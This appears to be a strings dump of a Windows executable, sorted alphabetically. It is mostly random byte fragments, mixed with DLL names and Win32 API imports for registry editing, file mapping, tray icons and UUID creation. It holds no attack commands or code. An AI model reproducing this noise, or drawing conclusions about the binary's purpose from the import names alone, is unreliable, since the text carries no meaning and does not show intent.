+mz" `
`@N"  
N>4B	ON
NdrFixedArrayFree
[N^f#(
 nH7A1f
`o0Qna
o_[cx(
o>]!]~d
@O@$` H
oh.dll
OJTJ		
olRZ^K:
_>o<m,
OpenWaitableTimerW
  OtN4
O`[v+!^
P0?y@QN
*` P)5z
PathFileExistsW
 @pDcq
\PdE?j
. @Pfp
\P@gjk}
P+=(Ip
;<^P?j
`)PL-Yf9
p}|m_f$
 P:}%O
@pW'zN
">Q7"h
q*``~9
}qe*@`
qM>@>](
qNmWmW
QQQQQQQQQQQQQQ
q @@Sn`7
QwX0*`
QYs@QU>@
r @`(@
r8:_^x
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegOpenKeyA
RegOpenKeyExA
RegQueryValueExA
RegSetValueExA
.reloc
riG!*TQ6@
Rk<U~B
RPCRT4.dll
:@RRm>z
RRRRRRRRRRRRR
@R-V4'
rxIg9rO
rYq;)}
^s49^a
[s=a#sm
sdy$GpA2Cj
{s;f(G
sG)Z]<|
SHELL32.dll
Shell_NotifyIconA
SHLWAPI.dll
% SItD
skA[lZ  
s	 `@n
=^'S/p
`spcrV
,s?_V.
T2'JKBV
tCanF~
!This program cannot be run in DOS mode.
th]zMk[g-
TIXr%bX
.@@)To
TPT*G{
TTTTTTTTTT
ttttttttttttttttttttttttt
  U* `
@`U&  
`Ug$@ CY
Ug\-emO
 u:m8x
UnmapViewOfFile
{U#+!oR
u@O/:'#X
uP6CSn
UuidCreate
uuuuuuuuuuuuuuuuuu
uV, `[
ux{P8&
&v2uyu
=V@<5o
@@Vbt&`
 @V @`G
Vnj @@H
voCLNe
 V+s_5&
@w9ZS*` 
_WAYX|
wn2RJ5
w[	Q.|}
?w>&Qv
wvh1>\io
WZ7eZDP
Wz{Y%E
x{@A\7
XAgE58
X=g4N6
Xg|A2J
/xpJ|Av)
x\V}-0}
XXXXXX
y/*/9F2D
Yaa<4`
>Yc5y(
y`+[GBK
ymn3Kt
y>m+X=
Yn$ @<
Y+n*}	3R
<Y;qM>%'`
yr`5,U
yyyyyyyy
Z^!*``
.Z+5.<
z$6,Xs
Z(``^[ZP
ZZZZZZZZ